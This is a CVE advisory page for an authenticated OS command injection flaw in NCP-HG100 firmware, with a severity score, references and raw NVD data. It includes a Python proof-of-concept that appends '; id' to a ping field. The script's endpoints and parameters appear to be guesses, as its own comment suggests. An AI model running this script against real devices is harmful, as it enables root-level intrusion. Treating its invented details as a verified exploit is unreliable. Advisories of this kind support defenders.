CVE-2025-64444

Description

Improper neutralization of special elements used in an OS command ('OS Command Injection') issue exists in NCP-HG100 1.4.48.16 and earlier. If exploited, a remote attacker who has obtained the authentication information to log in to the management page of the product may execute an arbitrary OS command with root privileges.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

NCP-HG100 <= 1.4.48.16

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-64444 PoC - OS Command Injection in NCP-HG100
# This PoC demonstrates the command injection vulnerability
# Note: This is for educational and authorized security testing only

import requests
import sys
from urllib.parse import quote

def exploit_cve_2025_64444(target_ip, username, password):
    """
    Exploit OS Command Injection in NCP-HG100 management interface
    """
    # Login to the management interface
    login_url = f"http://{target_ip}/cgi-bin/login.cgi"
    login_data = {
        "username": username,
        "password": password
    }
    
    session = requests.Session()
    try:
        login_response = session.post(login_url, data=login_data, timeout=10)
        
        if login_response.status_code == 200:
            # Inject OS command via vulnerable parameter
            # Replace 'VULNERABLE_PARAM' with actual parameter identified
            inject_url = f"http://{target_ip}/cgi-bin/admin.cgi"
            
            # Example: Execute 'id' command via injection
            payload = "; id"
            inject_data = {
                "command": "ping",
                "target": "127.0.0.1" + payload  # Command injection point
            }
            
            response = session.post(inject_url, data=inject_data, timeout=10)
            
            if "uid=0(root)" in response.text or "root" in response.text:
                print("[+] Command injection successful! Root access achieved.")
                return True
            else:
                print("[-] Exploitation failed or target not vulnerable.")
                return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) != 4:
        print("Usage: python cve_2025_64444.py <target_ip> <username> <password>")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    
    print(f"[*] Targeting NCP-HG100 at {target}")
    print(f"[*] Attempting exploitation...")
    exploit_cve_2025_64444(target, user, pwd)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-64444
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-64444
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-64444/
[4] VulDB https://vuldb.com/cve/CVE-2025-64444
[5] https://jvn.jp/en/jp/JVN49899607/
[6] https://support.sonynetwork.co.jp/faqsupport/manoma/web/knowledge11157.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-64444", "sourceIdentifier": "[email protected]", "published": "2025-11-14T06:15:42.877", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper neutralization of special elements used in an OS command ('OS Command Injection') issue exists in NCP-HG100 1.4.48.16 and earlier. If exploited, a remote attacker who has obtained the authentication information to log in to the management page of the product may execute an arbitrary OS command with root privileges."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://jvn.jp/en/jp/JVN49899607/", "source": "[email protected]"}, {"url": "https://support.sonynetwork.co.jp/faqsupport/manoma/web/knowledge11157.html", "source": "[email protected]"}]}}